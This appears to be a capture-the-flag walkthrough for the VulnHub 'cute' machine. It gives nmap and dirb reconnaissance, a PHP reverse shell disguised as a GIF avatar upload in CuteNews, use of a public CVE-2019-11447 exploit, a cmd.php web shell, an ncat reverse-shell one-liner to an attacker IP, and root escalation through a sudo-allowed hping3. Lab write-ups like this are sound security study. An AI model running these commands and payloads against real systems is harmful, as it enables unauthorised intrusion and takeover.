https://www.vulnhub.com/entry/bbs-cute-102,567/
Fix VM network
- Debian 10, network is broken in QEMU
- launch VM, edit GRUB parameters of line
linux ..., changerotorw, and addinit=/bin/bashafter it to by pass login - edit
/etc/network/interfaces, change interface name to ours, addauto enp1s0
Discover Target IP
sudo nmap -sn 192.168.122.1-255
Scan Ports
- `nmap -p- 192.168.122.122
nmap -p 22,80,88,110,995 -sC -sV 192.168.122.122
Port 80
- This site doesn’t have a
robots.txt - run
dirb http://192.168.122.122and found 83 results
CuteNews
- go to the
http://192.168.122.122/index.phpthat we found - we can’t login, but we can try to register a new account.
- it requires a CAPtCHA, if we view source code of the register page at
view-source:http://192.168.122.122/index.php?registerwe can findhttp://192.168.122.122/captcha.phpwith the captcha - once we created a account and logged in, we can try to change our information in the Personal Options page
- it has an option for us to upload a avatar picture, so we can try to upload a reverse shell script
PHP Reverse Shell
- get a copy of php reverse shell script to our current directory by
cp /usr/share/webshells/php/php-reverse-shell.php . - edit and change IP and port to attacker’s
- because this website will check for the file metadata, we can try to disguise it by adding
GIF8;to the beginning of the file, now the system will think it is a GIF image file. - after uploaded the image, save change, open a listening port on the attacker’s machine
ncat -nvlp 7373 - go back to the General options page, right click, open in new tab of the “image” that we just uploaded, it will bring us to
https://cute.calipendula/uploads/avatar_led_php-reverse-shell.php, it won’t work as this domain doesn’t exist, we can modify our/etc/hostsfile on attacker’s machine, or just changecute.calipendulato our target’s IP address, Now we have a shell
CVE 2019-11447
- because it is using CuteNews 2.1.2, we can use a Remote Code Execution exploit https://www.exploit-db.com/exploits/48800
- we need to change the path of the Python script, by removing all the
/CuteNewsfilepath name, as we don’t have in our target’s website. if using Vim:%s@/CuteNews@@ - run it and enter our target’s IP address, it will automatically create a user and give us prompt where we can input commands
- start a revese shell from here using
ncat 192.168.122.101 4444 -e /bin/bash -i
By file upload
- so put this into a
cmd.phpfile, upload it using the same method of uploading avatar as [above](#### PHP Reverse Shell) - open the “image” in browser, change the domain to target’s IP, add
?cmd=and put whatever command after ithttp://192.168.122.122/uploads/avatar_led_cmd.php?cmd=whoami - start a revese shell from here using
ncat 192.168.122.101 4444 -e /bin/bash -i
Privilege Esculation
- spawn a better shell with Python
python3 -c 'import pty;pty.spawn("/bin/bash")' - if we run
idcan seewww-datais definitely not in thesudogroup - but we can still run
sudo -lto see the sudoers file
User www-data may run the following commands on cute:
(root) NOPASSWD: /usr/sbin/hping3 --icmp
- it shows that
hping3will run asroot - if still not sure we can try
linpeas.shtoo - go to https://gtfobins.github.io/gtfobins/hping3/, it shows that it maintain its privileges.
- running
whoamiinsidehping3will show that we are root - we can try running bash with the same privilege by
bash -p, now we are in a root shell
Capture the flags
cat root.txt